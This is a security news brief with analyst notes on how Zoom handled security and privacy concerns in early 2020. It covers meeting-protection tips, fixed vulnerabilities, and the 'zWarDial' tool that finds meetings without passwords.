The video conferencing app Zoom has exploded in popularity with much of the world beginning to work from home. With the recent rise in popularity, however, came increased scrutiny and the attention of security researchers. In response to recent concerns about security and privacy, Zoom has outlined many of the steps it has taken to protect their users in a recent blog post.
A Zoom blog post offers tips for organizers to protect meetings from so-called “Zoombombers” disrupting meetings. When sharing meeting invitations, avoid posting your PMI (Personal Meeting ID) online; a random meeting ID should be generated for each event to avoid the possibility of meeting links from a prior event being used to join all future events. It is important to protect every online meeting with a password. Zoom also has a “Waiting Room” feature for the host to control who can enter the meeting. More ways to protect Zoom meetings can be found in the post.
Next, Zoom removed code from their iOS app and changed how and what information was collected from users. More information can be found on their updated privacy policy. The updated privacy policy also earned its own post explaining the changes in a much easier to understand format.
Educators also got their own set of tutorials on how to setup a more secure classroom for their students. Features like “Waiting Room” are also enabled by default for users enrolled in Zoom’s K-12 program. A dedicated privacy policy for the K-12 program was created as well.
Zoom acknowledged the security concerns around vulnerabilities and end-to-end encryption. Zoom has released a software update removing UNC (Universal Naming Convention) link rendering so they can’t be clicked. Issues with the MacOS installer and webcam vulnerability pointed out by researcher Patrick Wardle were also addressed.
Security reporter Brian Krebs described a tool called “zWarDial,” which is capable of discovering any currently active Zoom meeting that is not protected with a password. Using this tool, attackers can discover approximately 100 open meetings per hour. Zoom responded by saying it would enable passwords by default in all future scheduled meetings.
Analyst Notes
: Binary Defense analysts expect that people with malicious intent will continue to find ways to take advantage of any opportunity to disrupt online meetings using any platform, especially if participants are able to share video or images with all attendees. Zoom seems to be taking security issues seriously, by quickly responding to concerns and patching vulnerabilities. The security of online meetings using Zoom, or any other software, still relies on meeting organizers to understand and properly configure settings for each meeting. By following the steps outlined in their blog, users of Zoom’s conferencing app can protect themselves and their attendees. Protecting every Zoom meeting with a password is important because tools such as “zWarDial” allow attackers to randomly guess meeting IDs and join any meeting that does not require a password to join. Binary Defense also recommends applying any future updates released that may fix vulnerabilities or other concerns brought up due to upcoming security reviews by a third-party and an “enhanced” bug bounty program.
Source: https://blog.zoom.us/wordpress/2020/04/01/a-message-to-our-users/
https://krebsonsecurity.com/2020/04/war-dialing-tool-exposes-zooms-password-problems/
